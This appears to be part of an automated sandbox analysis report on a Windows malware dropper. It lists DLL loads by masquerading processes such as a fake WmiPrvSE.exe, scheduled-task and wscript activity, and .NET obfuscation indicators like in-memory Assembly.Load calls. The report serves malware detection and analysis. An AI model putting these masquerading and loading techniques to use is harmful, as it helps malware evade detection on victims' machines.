            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: propsys.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: netutils.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: slc.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: sppc.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: mscoree.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: apphelp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: version.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: uxtheme.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: windows.storage.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: wldp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: profapi.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptsp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: rsaenh.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptbase.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: sspicli.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: mscoree.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: version.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: uxtheme.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: windows.storage.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: wldp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: profapi.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptsp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: rsaenh.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptbase.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: mscoree.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: version.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: uxtheme.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: windows.storage.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: wldp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: profapi.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptsp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: rsaenh.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptbase.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: mscoree.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: uxtheme.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: profapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: cryptsp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rsaenh.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: cryptbase.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: amsi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: edputil.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: iphlpapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dnsapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: winnsi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: propsys.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasapi32.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasman.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rtutils.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: mswsock.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: winhttp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: urlmon.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: iertutil.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: srvcli.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: netutils.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: policymanager.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: msvcp110_win.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wintypes.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: appresolver.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: bcp47langs.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: slc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: sppc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasadhlp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: mscoree.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: uxtheme.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: profapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: cryptsp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rsaenh.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: cryptbase.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: amsi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: edputil.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: iphlpapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dnsapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: winnsi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: propsys.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasapi32.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasman.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rtutils.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: mswsock.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: winhttp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasadhlp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: urlmon.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: iertutil.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: srvcli.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: netutils.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: policymanager.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: msvcp110_win.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wintypes.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: appresolver.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: bcp47langs.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: slc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: sppc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: 4c6fK85tK7.exeStatic file information: File size 4329984 > 1048576
            Source: 4c6fK85tK7.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x41f000
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4c6fK85tK7.exe
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: componentWininto.exe, 00000008.00000002.2235833728.000000001C9D0000.00000004.08000000.00040000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003309000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: componentWininto.exe, 00000008.00000002.2235833728.000000001C9D0000.00000004.08000000.00040000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003309000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.AppDomain.Load(byte[])
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.Reflection.Assembly.Load(byte[])
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.AppDomain.Load(byte[])
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.Reflection.Assembly.Load(byte[])
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.AppDomain.Load(byte[])
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.Reflection.Assembly.Load(byte[])
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.AppDomain.Load(byte[])
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.Reflection.Assembly.Load(byte[])
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605B33F0 SetWindowLongPtrW,LoadLibraryA,GetProcAddress,FreeLibrary,DefWindowProcW,GetWindowLongPtrW,2_2_00007FF7605B33F0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeFile created: C:\msPortRefnetdhcp\__tmp_rar_sfx_access_check_5496796
            Source: yberLoad.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x416566
